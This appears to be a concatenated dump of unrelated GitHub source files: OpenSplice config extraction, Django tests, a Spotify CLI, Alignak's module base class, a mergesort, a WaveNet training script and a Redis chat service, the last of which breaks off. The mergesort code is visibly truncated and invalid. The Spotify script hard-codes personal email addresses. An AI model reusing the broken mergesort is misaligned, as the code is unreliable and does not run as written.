kind {}\".format(member.kind)\n ce.default = member.spelling\n elif member.kind == CursorKind.PAREN_EXPR:\n # assume NULL, (0): no default\n ce.default = None\n else:\n assert False, \\\n \"expected default, got unsupported member kind {}\".format(member.kind)\n\n # int relative_offset\n # int elem_offset\n # init_fun_t init;\n\n # update_fun_t update;\n member = members[8].get_children().next()\n if member.kind == CursorKind.DECL_REF_EXPR:\n ce.typehint = member.spelling\n elif ce.children:\n # groups don't need a typehint\n ce.typehint = None\n else:\n assert False, \\\n \"expected update-func, got unsupported member kind {}\".format(member.kind)\n\n # free_fun_t free;\n # print_fun_t print;\n\n # const char *description;\n member = members[11].get_children().next().get_children().next()\n if member.kind == CursorKind.STRING_LITERAL:\n ce.description = member.spelling\n elif member.kind == CursorKind.CSTYLE_CAST_EXPR:\n print(\"Warning: element '{}' has no description!\".format(name))\n ce.description = None\n\n assert ce not in group, \\\n \"element '{}' already exists in group '{}'\".format(ce.name, cursor.spelling)\n group.append(ce)\n\n #print(ce)\n else:\n #print(\"Unsupported kind {} at {}\".format(elem.kind, elem.extent))\n pass\n\n # Everything should have been merged down to one \"root\" cfgelem group\n assert len(groups) == 1, \\\n \"Single root group expected, but multiple groups retrieved: {}\".format(\",\".join(groups.keys()))\n\n # Obtain the the meta-config\n assert \"OSPL_HOME\" in os.environ, \\\n \"OSPL_HOME env.var not set: unable to locate and parse OpenSplice meta-config file\"\n\n meta_path = os.path.join(os.environ[\"OSPL_HOME\"], \"src\", \"tools\", \"cm\", \"config\", \"code\")\n meta_file = os.path.join(meta_path, \"splice_metaconfig_6.1.xml\")\n\n parser = etree.XMLParser(strip_cdata=False, remove_blank_text=True)\n tree = etree.parse(meta_file, parser=parser)\n root = tree.getroot()\n\n group = groups[groups.keys()[0]]\n groupToXML(group, root)\n\n backup_file = \"{}.bak.xml\".format(meta_file[:-4])\n print(\"Rename original XML-file to {}\".format(backup_file))\n os.rename(meta_file, backup_file)\n tree.write(meta_file, pretty_print=True, xml_declaration=True, encoding=\"UTF-8\")\n\nif __name__ == \"__main__\":\n includes = sys.argv[1:-1]\n cfile = sys.argv[-1]\n\n index = clang.cindex.Index.create()\n tu = index.parse(cfile, args=includes)\n\n # Fail on parse errors\n diag = list(tu.diagnostics)\n if len(diag) > 0:\n pprint(diag)\n sys.exit(1)\n\n #print_cfgelem_ast(tu)\n extract(tu)\n","repo_name":"ADLINK-IST/opensplice","sub_path":"src/services/cmagent/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":21251,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"66"} +{"seq_id":"1168349311","text":"import pytest\nfrom django.db import models\nfrom main.config import setting\nfrom tenant.models import Organization, MainUser\n\nsetting.get_cached_configs()\n\n\n@pytest.fixture\ndef organization():\n return Organization.objects.create(\n name=\"sponix-user\",\n organization_id=setting.AUTH0_MANAGEMENT_ORGANIZATION_KEY\n )\n\n\n@pytest.fixture\ndef main_user(organization):\n return MainUser.objects.create(\n user_id=\"test_user\",\n organization=organization,\n active=True\n )\n\n\n@pytest.mark.django_db\ndef test_organization_model(organization):\n assert organization.name == \"sponix-user\"\n assert organization.organization_id == setting.AUTH0_MANAGEMENT_ORGANIZATION_KEY\n assert 
organization.set_organization_id() == organization.organization_id\n assert organization.is_manager is True\n\n\n@pytest.mark.django_db\ndef test_main_user_model(main_user):\n assert main_user.user_id == \"test_user\"\n assert main_user.organization.name == \"sponix-user\"\n assert main_user.active is True\n assert str(main_user) == f\"userID: {main_user.user_id} organization: {main_user.organization_id}\"\n assert main_user.is_authenticated is True\n assert main_user.is_anonymous is False\n assert main_user.is_staff is True\n","repo_name":"MohamadAhmadi100/django-multi-tenant","sub_path":"tenant/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70744873490","text":"from apis import spotify\nfrom apis import twilio\nimport pandas\n\ndef print_menu():\n print('''\n---------------------------------------------------------------------\nSettings / Browse Options\n---------------------------------------------------------------------\n1 - Select your favorite genres \n2 - Select your favorite artists \n3 - Discover new music\n4 - Quit\n---------------------------------------------------------------------\n ''')\n\ngenres=[] \ncounter=1\n\ndef handle_genre_selection():\n global counter\n print('\\nHandle genre selection here...', '\\n')\n genres_available=spotify.get_genres_abridged()\n for genre in genres_available:\n print(counter, '-',genre)\n counter+=1\n print('\\nSelect one or more genres (type the number of the genre)') \n \n user_genre_selection_01=int(input('\\nFirst choice: '))\n genres.append(genres_available[user_genre_selection_01 - 1])\n\n while True:\n user_number_of_genres_to_choose=int(input('How many more genres would you like to choose ( 0, 1, or 2)? 
'))\n \n if user_number_of_genres_to_choose ==1:\n user_genre_selection_02= int(input('Second choice: '))\n genres.append(genres_available[user_genre_selection_02 - 1])\n \n if user_number_of_genres_to_choose ==2:\n user_genre_selection_02= int(input('Second choice: '))\n user_genre_selection_03= int(input('Third choice: '))\n genres.append(genres_available[user_genre_selection_02 - 1])\n genres.append(genres_available[user_genre_selection_03 - 1])\n \n if user_number_of_genres_to_choose !=2 and user_number_of_genres_to_choose !=1 and user_number_of_genres_to_choose !=0:\n print('The number you entered is invalid, please enter either 0,1, or 2')\n continue\n print('Your genre choices are the following: ')\n for genre in genres:\n print(genre)\n decision_to_clear=input('Would you like to clear the list?(yes or no)')\n if decision_to_clear == 'yes':\n genres.clear()\n continue\n if decision_to_clear=='no':\n break\n\nartists=[]\ndef handle_artist_selection():\n second_counter=0\n while True:\n choose_artist=input('Write down a name of an artist: ')\n\n spotify_artist_result=spotify.get_artists(choose_artist)\n print ('Here are the following artists that were found:','\\n')\n for artist in spotify_artist_result:\n print(second_counter+1,'-',artist.get('name'))\n second_counter +=1\n \n what_artist_to_pick = input('\\nFrom this list, type up to 3 artists you want to listen to (seperate names by a comma)')\n what_artist_to_pick_as_a_list= what_artist_to_pick.split(',')\n \n for choice in what_artist_to_pick_as_a_list:\n artists.append(choice)\n print ('Here are the artists you picked:')\n for element in artists:\n print( '---',element)\n \n decision_to_clear_or_add =input('\\nWould you like to clear out the list or add more artists? (type \"no\", \"clear out\", or \"add\")')\n if decision_to_clear_or_add =='clear out':\n artists.clear()\n continue\n if decision_to_clear_or_add==\"add\":\n continue\n if decision_to_clear_or_add ==\"no\":\n break\n\ntemplate = '''\n \n {name}\n \n

    {name}
    \n        
    Listen on Spotify
    \n \n \n \n'''\ndef get_recommendations():\n recommendations = spotify.get_similar_tracks(genres=genres)\n organized_table = pandas.DataFrame(recommendations)\n print (organized_table[['name','share_url']])\n\n\n email_or_not=input('Would you like to email this recommendation list? (yes or no)')\n if email_or_not == 'yes':\n organized_list_html =spotify.get_formatted_tracklist_table_html(recommendations)\n twilio.send_mail('nourtaqatqa2025@u.northwestern.edu',['nourtaqatqa2025@u.northwestern.edu','nour.s.taqatqa10@gmail.com'],\n 'Spotify recommendation list',organized_list_html)\n\n# Begin Main Program Loop:\nwhile True:\n print_menu()\n choice = input('What would you like to do? ')\n if choice == '1':\n handle_genre_selection()\n elif choice == '2':\n handle_artist_selection()\n elif choice == '3':\n get_recommendations() \n elif choice == '4':\n print('Quitting...')\n break\n else:\n print(choice, 'is an invalid choice. Please try again.')\n print()\n input('Press enter to continue...')\n","repo_name":"nour-taqatqa/CS-110-Project-Spotify","sub_path":"music_finder.py","file_name":"music_finder.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32044287809","text":"import numpy as np\n\ndatasets = np.array(range(1, 41)).reshape(10, 4) # 1부터 40까지 벡터/ 1차원\nprint(datasets)\nprint(datasets.shape) # (10, 4)\n\n# x_data = datasets(:, :3) #3-1\nx_data = datasets[:, :-1]\n# x_data = datasets[0:3]\ny_data = datasets[:, -1]\nprint(x_data)\nprint(y_data)\nprint(x_data.shape, y_data.shape) # (10, 3) (10,)\n\ntimesteps = 3\n\n#####x 만들기 #####\ndef split_x(dataset, timesteps): \n aaa = []\n for i in range(len(dataset) - timesteps):\n subset = dataset[i : (i + timesteps)]\n aaa.append(subset)\n return np.array(aaa)\n\n# 6번을 반복하겠어요\n# i는 카운트 하나씩 올라간다\n# if문, 반복문(for)\n\n# timesteps 6으로 해야 1시간 뒤에 걸 맞춘다\n\nbbb = split_x(x_data, timesteps)\nprint(bbb)\nprint(bbb.shape) # (5, 5, 3)\n\n##### y만들기 #####\ny_data = y_data[timesteps:]\nprint (y_data)","repo_name":"bigcenter91/Stduy_","sub_path":"keras/keras_41~50/keras43_split_4_행렬자르기.py","file_name":"keras43_split_4_행렬자르기.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"23564832082","text":"import os\nimport signal\nimport traceback\nimport re\nfrom multiprocessing import Queue, Process\nimport logging\n\nfrom alignak.misc.common import setproctitle, SIGNALS_TO_NAMES_DICT\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\nKILL_TIME = 10\n\n# The `properties` dict defines what the module can do and\n# if it's an external module or not.\n# pylint: disable=invalid-name\nproperties = {\n # module type ; to distinguish between them:\n # retention, logs, configuration, livestate, ...\n 'type': None,\n\n # is the module \"external\" (external means here a daemon module)?\n 'external': True,\n\n # Possible configuration phases where the module is involved:\n 'phases': ['configuration', 'late_configuration', 'running', 'retention'],\n}\n\n\nclass BaseModule(object):\n # pylint: disable=too-many-instance-attributes\n \"\"\"This is the base class for the Alignak modules.\n Modules can be used by the different Alignak daemons for different tasks.\n Example of task that an Alignak module can do:\n - load additional configuration objects.\n - recurrently save hosts/services status/perfdata information in different format.\n - ...\n \"\"\"\n\n 
def __init__(self, mod_conf):\n \"\"\"Instantiate a new module.\n\n There can be many instance of the same module.\n\n mod_conf is a dictionary that contains:\n - all the variables declared in the module configuration file\n - a 'properties' value that is the module properties as defined globally in this file\n - a 'my_daemon' property that is a reference to the Daemon object that loaded the module\n\n :param mod_conf: module configuration file as a dictionary\n :type mod_conf: dict\n \"\"\"\n self.myconf = mod_conf\n self.name = mod_conf.get_name()\n self.my_daemon = getattr(mod_conf, 'my_daemon', None)\n\n self.props = mod_conf.properties.copy()\n # TODO: choose between 'props' or 'properties'..\n self.interrupted = False\n self.properties = self.props\n self.is_external = self.props.get('external', False)\n\n # though a module defined with no phase is quite useless .\n self.phases = self.props.get('phases', [])\n\n # the queue the module will receive data to manage\n self.to_q = None\n # the queue the module will put its result data\n self.from_q = None\n self.process = None\n self.illegal_char = re.compile(r'[^\\w-]')\n # Initialization try count and time\n self.init_try = 0\n self.last_init_try = 0\n # We want to know where we are load from? (broker, scheduler, etc)\n self.loaded_into = 'unknown'\n\n # External module force kill delay - default is to wait for\n # 60 seconds before killing a module abruptly\n self.kill_delay = int(getattr(mod_conf, 'kill_delay', '60'))\n\n # Self module monitoring (cpu, memory)\n self.module_monitoring = False\n self.module_monitoring_period = 10\n if 'ALIGNAK_DAEMON_MONITORING' in os.environ:\n self.module_monitoring = True\n try:\n self.system_health_period = int(os.environ.get('ALIGNAK_DAEMON_MONITORING', '10'))\n except ValueError: # pragma: no cover, simple protection\n pass\n if self.module_monitoring:\n print(\"Module self monitoring is enabled, reporting every %d loop count.\"\n % self.module_monitoring_period)\n\n @property\n def alias(self):\n \"\"\"Module name may be stored in an alias property\n Stay compatible with older modules interface\n \"\"\"\n return self.name\n\n def get_name(self):\n \"\"\"Wrapper to access name attribute\n\n :return: module name\n :rtype: str\n \"\"\"\n return self.name\n\n def init(self): # pylint: disable=no-self-use\n \"\"\"Handle this module \"post\" init ; just before it'll be started.\n\n This function initializes the module instance. 
If False is returned, the modules manager\n will periodically retry an to initialize the module.\n If an exception is raised, the module will be definitely considered as dead :/\n\n This function must be present and return True for Alignak to consider the module as loaded\n and fully functional.\n\n :return: True / False according to initialization succeeded or not\n :rtype: bool\n \"\"\"\n return True\n\n def set_loaded_into(self, daemon_name):\n \"\"\"Setter for loaded_into attribute\n Used to know what daemon has loaded this module\n\n :param daemon_name: value to set\n :type daemon_name: str\n :return: None\n \"\"\"\n self.loaded_into = daemon_name\n\n def create_queues(self, manager=None):\n \"\"\"\n Create the shared queues that will be used by alignak daemon\n process and this module process.\n But clear queues if they were already set before recreating new one.\n\n Note:\n If manager is None, then we are running the unit tests for the modules and\n we must create some queues for the external modules without a SyncManager\n\n :param manager: Manager() object\n :type manager: None | object\n :return: None\n \"\"\"\n self.clear_queues(manager)\n # If no Manager() object, go with classic Queue()\n if not manager:\n self.from_q = Queue()\n self.to_q = Queue()\n else:\n self.from_q = manager.Queue()\n self.to_q = manager.Queue()\n\n def clear_queues(self, manager):\n \"\"\"Release the resources associated to the queues of this instance\n\n :param manager: Manager() object\n :type manager: None | object\n :return: None\n \"\"\"\n for queue in (self.to_q, self.from_q):\n if queue is None:\n continue\n # If we got no manager, we directly call the clean\n if not manager:\n try:\n queue.close()\n queue.join_thread()\n except AttributeError:\n pass\n # else:\n # q._callmethod('close')\n # q._callmethod('join_thread')\n self.to_q = self.from_q = None\n\n def start_module(self):\n \"\"\"Wrapper for _main function.\n Catch and raise any exception occurring in the main function\n\n :return: None\n \"\"\"\n try:\n self._main()\n except Exception as exp:\n logger.exception('%s', traceback.format_exc())\n raise Exception(exp)\n\n def start(self, http_daemon=None): # pylint: disable=unused-argument\n \"\"\"Actually restart the process if the module is external\n Try first to stop the process and create a new Process instance\n with target start_module.\n Finally start process.\n\n :param http_daemon: Not used here but can be used in other modules\n :type http_daemon: None | object\n :return: None\n \"\"\"\n\n if not self.is_external:\n return\n\n if self.process:\n self.stop_process()\n logger.info(\"Starting external process for module %s...\", self.name)\n proc = Process(target=self.start_module, args=(), group=None)\n\n # Under windows we should not call start() on an object that got its process\n # as an object, so we remove it and we set it in a earlier start\n try:\n del self.properties['process']\n except KeyError:\n pass\n\n proc.start()\n # We save the process data AFTER the fork()\n self.process = proc\n self.properties['process'] = proc\n logger.info(\"%s is now started (pid=%d)\", self.name, proc.pid)\n\n def kill(self):\n \"\"\"Sometime terminate() is not enough, we must \"help\"\n external modules to die...\n\n :return: None\n \"\"\"\n\n logger.info(\"Killing external module (pid=%d) for module %s...\",\n self.process.pid, self.name)\n if os.name == 'nt':\n self.process.terminate()\n else:\n self.process.terminate()\n # Wait for 10 seconds before killing the process abruptly\n 
self.process.join(timeout=KILL_TIME)\n # You do not let me another choice guy...\n if self.process.is_alive():\n logger.warning(\"%s is still living %d seconds after a normal kill, \"\n \"I help it to die\", self.name, KILL_TIME)\n os.kill(self.process.pid, signal.SIGKILL)\n self.process.join(1)\n if self.process.is_alive():\n logger.error(\"%s still living after brutal kill, I leave it.\", self.name)\n logger.info(\"External module killed\")\n\n def stop_process(self):\n \"\"\"Request the module process to stop and release it\n\n :return: None\n \"\"\"\n if not self.process:\n return\n\n logger.info(\"I'm stopping module %r (pid=%d)\", self.name, self.process.pid)\n self.kill()\n # Clean inner process reference\n self.process = None\n\n def want_brok(self, b): # pylint: disable=unused-argument,no-self-use\n \"\"\"Generic function to check if the module need a specific brok\n In this case it is always True\n\n :param b: brok to check\n :type b: alignak.brok.Brok\n :return: True if the module wants the brok, False otherwise\n :rtype: bool\n \"\"\"\n return True\n\n def manage_brok(self, brok):\n \"\"\"Request the module to manage the given brok.\n There are a lot of different possible broks to manage. The list is defined\n in the Brok class.\n\n An internal module may redefine this function or, easier, define only the function\n for the brok it is interested with. Hence a module interested in the `service_check_result`\n broks will only need to define a function named as `manage_service_check_result_brok`\n\n :param brok:\n :type brok:\n :return:\n :rtype:\n \"\"\"\n\n manage = getattr(self, 'manage_' + brok.type + '_brok', None)\n if not manage:\n return False\n\n # Be sure the brok is prepared before calling the function\n brok.prepare()\n return manage(brok)\n\n def manage_signal(self, sig, frame): # pylint: disable=unused-argument\n \"\"\"Generic function to handle signals\n\n Only called when the module process received SIGINT or SIGKILL.\n\n Set interrupted attribute to True, self.process to None and returns\n\n :param sig: signal sent\n :type sig:\n :param frame: frame before catching signal\n :type frame:\n :return: None\n \"\"\"\n logger.info(\"received a signal: %s\", SIGNALS_TO_NAMES_DICT[sig])\n\n if sig == signal.SIGHUP:\n # if SIGHUP, reload configuration in arbiter\n logger.info(\"Modules are not able to reload their configuration. 
\"\n \"Stopping the module...\")\n\n logger.info(\"Request to stop the module\")\n self.interrupted = True\n # self.process = None\n\n def set_signal_handler(self, sigs=None):\n \"\"\"Set the signal handler to manage_signal (defined in this class)\n\n Only set handlers for:\n - signal.SIGTERM, signal.SIGINT\n - signal.SIGUSR1, signal.SIGUSR2\n - signal.SIGHUP\n\n :return: None\n \"\"\"\n if sigs is None:\n sigs = (signal.SIGTERM, signal.SIGINT, signal.SIGUSR1, signal.SIGUSR2, signal.SIGHUP)\n\n func = self.manage_signal\n if os.name == \"nt\": # pragma: no cover, no Windows implementation currently\n try:\n import win32api\n win32api.SetConsoleCtrlHandler(func, True)\n except ImportError:\n version = \".\".join([str(i) for i in os.sys.version_info[:2]])\n raise Exception(\"pywin32 not installed for Python \" + version)\n else:\n for sig in sigs:\n signal.signal(sig, func)\n\n set_exit_handler = set_signal_handler\n\n def do_stop(self):\n \"\"\"Called just before the module will exit\n Put in this method all you need to cleanly\n release all open resources used by your module\n\n :return: None\n \"\"\"\n pass\n\n def do_loop_turn(self):\n \"\"\"For external modules only:\n implement in this method the body of you main loop\n\n :return: None\n \"\"\"\n raise NotImplementedError()\n\n def set_proctitle(self, name):\n \"\"\"Wrapper for setproctitle method\n\n :param name: module alias\n :type name: str\n :return: None\n \"\"\"\n setproctitle(\"alignak-%s module: %s\" % (self.loaded_into, name))\n\n def main(self):\n \"\"\"\n Main function of BaseModule\n\n :return: None\n \"\"\"\n logger.info(\"BaseModule.main() not defined in your %s\", self.__class__)\n\n def _main(self):\n \"\"\"module \"main\" method. Only used by external modules.\n\n :return: None\n \"\"\"\n self.set_proctitle(self.name)\n self.set_signal_handler()\n\n logger.info(\"process for module %s is now running (pid=%d)\", self.name, os.getpid())\n\n # Will block here!\n try:\n self.main()\n except (IOError, EOFError):\n pass\n # logger.warning('[%s] EOF exception: %s', self.name, traceback.format_exc())\n except Exception as exp: # pylint: disable=broad-except\n logger.exception('main function exception: %s', exp)\n\n self.do_stop()\n\n logger.info(\"process for module %s is now exiting (pid=%d)\", self.name, os.getpid())\n exit()\n\n # TODO: apparently some modules would uses \"work\" as the main method??\n work = _main\n","repo_name":"Alignak-monitoring/alignak","sub_path":"alignak/basemodule.py","file_name":"basemodule.py","file_ext":"py","file_size_in_byte":13849,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"66"} +{"seq_id":"41814564180","text":"def merge(left, right):\n L = []\n i = j = 0\n\n while i < len(left) or j < len(right):\n if i >= len(left):\n L.append(right[j])\n j += 1\n elif j >= len(right):\n L.append(left[i])\n i += 1\n else:\n if left[i] <= right[j]:\n L.append(left[i])\n i += 1\n else:\n L.append(right[j])\n j += 1\n return L\n\ndef bottom_up_mergesort(L):\n length=len(L)\n if(length<=2): #This is the edge case when list is smaller than 2\n if(length<2):\n return L\n else:\n if(L[0]>L[1]):\n L[0],L[1]=L[1],L[0]\n return L\n i=2\n while(i=length): #This is to sort the whole list one last time\n l=length-len(temp)\n left=L[:l]\n right=L[l:]\n temp = merge(left, right)\n\n L=temp\n return 
L\n\nL2=[-74,48,-20,2,10,-84,-5,-9,11,-24,-91,2,-71,64,63,80,28,-30,-58,-11,-44,-87,-22,54,-74,-10,-55,-28,-46,29,10,50,-72,34,26,25,8,51,13,30,35,-8,50,65,-6,16,-2,21,-78,35,-13,14,23,-3,26,-90,86,25,-56,91,-13,92,-25,37,57,-20,-69,98,95,45,47,29,86,-28,73,-44,-46,65,-84,-96,-24,-12,72,-68,93,57,92,52,-45,-2,85,-63,56,55,12,-85,77,-39]\nprint(bottom_up_mergesort(L2))\n","repo_name":"Zicheng-Li/sorting-lab","sub_path":"bottom_up_mergesort.py","file_name":"bottom_up_mergesort.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3539802274","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path('',views.index, name='index'),\n path('index.html',views.index, name='index'),\n path('about.html',views.about, name='about'),\n path('blog.html',views.blog, name='blog'),\n path('contact.html',views.contact, name='contact'),\n path('pakages.html',views.pakages, name='pakages'),\n]\n","repo_name":"Aniket0898/traveller","sub_path":"travel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6001518185","text":"\"\"\"Training script for the WaveNet network.\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nfrom datetime import datetime\nimport json\nimport os\nimport sys\nimport time\n\nimport tensorflow as tf\n\nfrom wavenet import WaveNetModel, TextReader\n\nBATCH_SIZE = 1\nDATA_DIRECTORY = './data'\nLOGDIR_ROOT = './logdir'\nCHECKPOINT_EVERY = 500\nNUM_STEPS = 4000\nLEARNING_RATE = 0.001\nWAVENET_PARAMS = './wavenet_params.json'\nSTARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now())\nSAMPLE_SIZE = 1000\nL2_REGULARIZATION_STRENGTH = 0\n\n\ndef get_arguments():\n parser = argparse.ArgumentParser(description='WaveNet example network')\n parser.add_argument('--batch_size', type=int, default=BATCH_SIZE,\n help='How many wav files to process at once.')\n parser.add_argument('--data_dir', type=str, default=DATA_DIRECTORY,\n help='The directory containing the VCTK corpus.')\n parser.add_argument('--logdir', type=str, default=None,\n help='Directory in which to store the logging '\n 'information for TensorBoard. '\n 'If the model already exists, it will restore '\n 'the state and will continue training. '\n 'Cannot use with --logdir_root and --restore_from.')\n parser.add_argument('--logdir_root', type=str, default=None,\n help='Root directory to place the logging '\n 'output and generated model. These are stored '\n 'under the dated subdirectory of --logdir_root. '\n 'Cannot use with --logdir.')\n parser.add_argument('--restore_from', type=str, default=None,\n help='Directory in which to restore the model from. '\n 'This creates the new model under the dated directory '\n 'in --logdir_root. 
'\n 'Cannot use with --logdir.')\n parser.add_argument('--checkpoint_every', type=int, default=CHECKPOINT_EVERY,\n help='How many steps to save each checkpoint after')\n parser.add_argument('--num_steps', type=int, default=NUM_STEPS,\n help='Number of training steps.')\n parser.add_argument('--learning_rate', type=float, default=LEARNING_RATE,\n help='Learning rate for training.')\n parser.add_argument('--wavenet_params', type=str, default=WAVENET_PARAMS,\n help='JSON file with the network parameters.')\n parser.add_argument('--sample_size', type=int, default=SAMPLE_SIZE,\n help='Concatenate and cut text samples to this many '\n 'samples.')\n parser.add_argument('--l2_regularization_strength', type=float,\n default=L2_REGULARIZATION_STRENGTH,\n help='Coefficient in the L2 regularization. '\n 'Disabled by default')\n return parser.parse_args()\n\n\ndef save(saver, sess, logdir, step):\n model_name = 'model.ckpt'\n checkpoint_path = os.path.join(logdir, model_name)\n print('Storing checkpoint to {} ...'.format(logdir), end=\"\")\n sys.stdout.flush()\n\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n\n saver.save(sess, checkpoint_path, global_step=step)\n print(' Done.')\n\n\ndef load(saver, sess, logdir):\n print(\"Trying to restore saved checkpoints from {} ...\".format(logdir),\n end=\"\")\n\n ckpt = tf.train.get_checkpoint_state(logdir)\n if ckpt:\n print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path))\n global_step = int(ckpt.model_checkpoint_path\n .split('/')[-1]\n .split('-')[-1])\n print(\" Global step was: {}\".format(global_step))\n print(\" Restoring...\", end=\"\")\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\" Done.\")\n return global_step\n else:\n print(\" No checkpoint found.\")\n return None\n\n\ndef get_default_logdir(logdir_root):\n logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING)\n return logdir\n\n\ndef validate_directories(args):\n \"\"\"Validate and arrange directory related arguments.\"\"\"\n\n # Validation\n if args.logdir and args.logdir_root:\n raise ValueError(\"--logdir and --logdir_root cannot be \"\n \"specified at the same time.\")\n\n if args.logdir and args.restore_from:\n raise ValueError(\n \"--logdir and --restore_from cannot be specified at the same \"\n \"time. 
This is to keep your previous model from unexpected \"\n \"overwrites.\\n\"\n \"Use --logdir_root to specify the root of the directory which \"\n \"will be automatically created with current date and time, or use \"\n \"only --logdir to just continue the training from the last \"\n \"checkpoint.\")\n\n # Arrangement\n logdir_root = args.logdir_root\n if logdir_root is None:\n logdir_root = LOGDIR_ROOT\n\n logdir = args.logdir\n if logdir is None:\n logdir = get_default_logdir(logdir_root)\n print('Using default logdir: {}'.format(logdir))\n\n restore_from = args.restore_from\n if restore_from is None:\n # args.logdir and args.restore_from are exclusive,\n # so it is guaranteed the logdir here is newly created.\n restore_from = logdir\n\n return {\n 'logdir': logdir,\n 'logdir_root': args.logdir_root,\n 'restore_from': restore_from\n }\n\n\ndef main():\n args = get_arguments()\n\n try:\n directories = validate_directories(args)\n except ValueError as e:\n print(\"Some arguments are wrong:\")\n print(str(e))\n return\n\n logdir = directories['logdir']\n restore_from = directories['restore_from']\n\n # Even if we restored the model, we will treat it as new training\n # if the trained model is written into an arbitrary location.\n is_overwritten_training = logdir != restore_from\n\n with open(args.wavenet_params, 'r') as f:\n wavenet_params = json.load(f)\n\n # Create coordinator.\n coord = tf.train.Coordinator()\n\n # Load raw text.\n with tf.name_scope('create_inputs'):\n reader = TextReader(\n args.data_dir,\n coord,\n sample_size=args.sample_size)\n text_batch = reader.dequeue(args.batch_size)\n\n # Create network.\n net = WaveNetModel(\n batch_size=args.batch_size,\n dilations=wavenet_params[\"dilations\"],\n filter_width=wavenet_params[\"filter_width\"],\n residual_channels=wavenet_params[\"residual_channels\"],\n dilation_channels=wavenet_params[\"dilation_channels\"],\n skip_channels=wavenet_params[\"skip_channels\"],\n quantization_channels=wavenet_params[\"quantization_channels\"],\n use_biases=wavenet_params[\"use_biases\"])\n if args.l2_regularization_strength == 0:\n args.l2_regularization_strength = None\n loss = net.loss(text_batch, args.l2_regularization_strength)\n optimizer = tf.train.AdamOptimizer(learning_rate=args.learning_rate)\n trainable = tf.trainable_variables()\n optim = optimizer.minimize(loss, var_list=trainable)\n\n # Set up session\n sess = tf.Session(config=tf.ConfigProto(log_device_placement=False))\n init = tf.initialize_all_variables()\n sess.run(init)\n\n # Saver for storing checkpoints of the model.\n saver = tf.train.Saver()\n\n try:\n saved_global_step = load(saver, sess, restore_from)\n if is_overwritten_training or saved_global_step is None:\n # The first training step will be saved_global_step + 1,\n # therefore we put -1 here for new or overwritten trainings.\n saved_global_step = -1\n\n except:\n print(\"Something went wrong while restoring checkpoint. 
\"\n \"We will terminate training to avoid accidentally overwriting \"\n \"the previous model.\")\n raise\n\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n reader.start_threads(sess)\n\n try:\n last_saved_step = saved_global_step\n for step in range(saved_global_step + 1, args.num_steps):\n start_time = time.time()\n loss_value, _ = sess.run([loss, optim])\n print(\"fin step\", step)\n duration = time.time() - start_time\n print('step {:d} - loss = {:.3f}, ({:.3f} sec/step)'\n .format(step, loss_value, duration))\n\n if step % args.checkpoint_every == 0:\n save(saver, sess, logdir, step)\n last_saved_step = step\n\n except KeyboardInterrupt:\n # Introduce a line break after ^C is displayed so save message\n # is on its own line.\n print()\n finally:\n if step > last_saved_step:\n save(saver, sess, logdir, step)\n coord.request_stop()\n coord.join(threads)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Zeta36/tensorflow-tex-wavenet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":344,"dataset":"github-code","pt":"66"} +{"seq_id":"25067533405","text":"import asyncio\nfrom fastapi.websockets import WebSocket, WebSocketDisconnect\nfrom redis.asyncio import Redis\nfrom db.models import Room, Message, User\nfrom pydantic.error_wrappers import ValidationError\nimport logging\n\n\nclass RedisService:\n def __init__(self, redis: Redis):\n self._redis = redis\n\n def _make_user_key(self, username: str) -> str:\n return f\"user:{username}\"\n\n def _make_room_key(self, chat_id: str) -> str:\n return f\"room:{chat_id}\"\n\n async def add_user_to_room(self, username: str, room_id: str):\n user_key = self._make_user_key(username)\n room_key = self._make_room_key(room_id)\n await self._redis.sadd(room_key, user_key)\n\n async def remove_user_from_room(self, username: str, room_id: str):\n user_key = self._make_user_key(username)\n room_key = self._make_room_key(room_id)\n await self._redis.srem(room_key, user_key)\n\n async def get_room_info(self, room_id: str) -> list[User]:\n room_key = self._make_room_key(room_id)\n users = await self._redis.smembers(room_key)\n return [User.parse_raw(user) for user in users]\n\n async def user_room_exists(self, username: str, room_id: str) -> bool:\n user_key = self._make_user_key(username)\n room_key = self._make_room_key(room_id)\n return await self._redis.sismember(room_key, user_key)\n\n async def send_message_to_stream(self, room_id: str, fields):\n await self._redis.xadd(\n name=f\"room:{room_id}:stream\", fields=fields, maxlen=1000\n )\n\n async def read_data_stream(self, room_id: str, last_id: str = b\"$\"):\n stream = f\"room:{room_id}:stream\"\n events = await self._redis.xread(streams={stream: last_id}, block=0)\n return events\n \n async def announce(self, room_id: str, username: str, type: str):\n await self.send_message_to_stream(room_id, {\"type\": type, \"username\": username})\n\n\nclass ChatService:\n def __init__(\n self,\n redis_service: RedisService,\n user_collection: User,\n room_collection: Room,\n message_collection: Message,\n ):\n self.redis_service = redis_service\n self._users = user_collection\n self._rooms = room_collection\n self._messages = message_collection\n\n def make_chat_info(self, user: User, room: Room) -> str:\n return f\"{user.id}:{user.username};{room.id}:{room.name}\"\n\n async def create_chat(self, user: User, chat_name: str) -> 